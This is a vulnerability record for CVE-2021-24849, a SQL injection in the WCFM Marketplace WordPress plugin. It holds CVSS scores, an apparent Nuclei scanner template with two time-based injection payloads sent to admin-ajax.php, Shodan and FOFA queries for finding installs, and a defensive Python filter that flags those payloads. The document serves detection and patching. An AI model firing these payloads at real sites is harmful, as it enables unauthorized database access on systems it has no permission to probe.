CVSS2
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score
Confidence: High

EPSS
Percentile: 89.6%

The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to both unauthenticated and authenticated users, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.

id: CVE-2021-24849

info:
  name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
  remediation: Fixed in 3.4.12
  reference:
    - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24849
    - https://wordpress.org/plugins/wc-multivendor-marketplace/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24849
    cwe-id: CWE-89
    epss-score: 0.02367
    epss-percentile: 0.89814
    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wclovers
    product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace
    fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace
    publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
  tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers

flow: http(1) && http(2)

http:
  # Request 1: confirm the plugin is installed (internal matcher, gates request 2)
  - raw:
      - |
        GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
        condition: and
        internal: true

  # Request 2: time-based check against the AJAX action
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{post_data}}

    payloads:
      post_data:
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains(body, "success")'
        condition: and
# digest: 4a0a004730450220762529702cf9c44426ee86704109c265d0bdce11a27ee57d58983eee2afe7e5b022100f0231e5ac1bec978442364e9e2c3216b59cff01248ee65e7565c5c29f7c0d188:922c64590222798bb761d5b6d8e72950
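
An added example, not part of the template above or of the plugin's own code: a request-body check that could sit in front of /wp-admin/admin-ajax.php as a detection rule or virtual patch until the plugin is updated to 3.4.12. The strict formats for transaction_id and orderby are assumptions, the function and rule names are hypothetical, and only the two parameters the template exercises are covered.

```python
import re
from urllib.parse import parse_qs

# Assumed formats (not taken from the plugin source): a numeric id and a
# plain column name. Anything else in these fields is reported.
RULES = {
    "transaction_id": re.compile(r"[0-9]{1,20}"),
    "orderby": re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}"),
}

# Sample bodies: the first two are the payloads from the template above,
# the last two are constructed benign requests.
SAMPLES = [
    "action=wcfm_ajax_controller&controller=wcfm-refund-requests"
    "&transaction_id=1+union+select+1+and+sleep(5)--",
    "action=wcfm_ajax_controller&controller=wcfm-refund-requests"
    "&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`",
    "action=wcfm_ajax_controller&controller=wcfm-refund-requests"
    "&transaction_id=17&orderby=ID",
    "action=heartbeat&interval=15",
]


def inspect_body(body: str) -> list[str]:
    """Return the parameter names in a form-encoded body that break RULES.

    Only bodies carrying action=wcfm_ajax_controller are inspected; any
    other action yields an empty list.
    """
    # parse_qs URL-decodes values ('+' and %20 both become a space).
    params = parse_qs(body, keep_blank_values=True)
    if "wcfm_ajax_controller" not in params.get("action", []):
        return []
    bad = []
    for name, pattern in RULES.items():
        # Check every occurrence so a duplicated parameter cannot hide
        # a bad value behind a clean one.
        if any(not pattern.fullmatch(v) for v in params.get(name, [])):
            bad.append(name)
    return bad


if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_body(sample) or "ok", "<-", sample[:70])
```

A non-empty result is grounds to block or alert on the request. The description says multiple parameters are affected, so RULES would need an entry for each one the site actually receives.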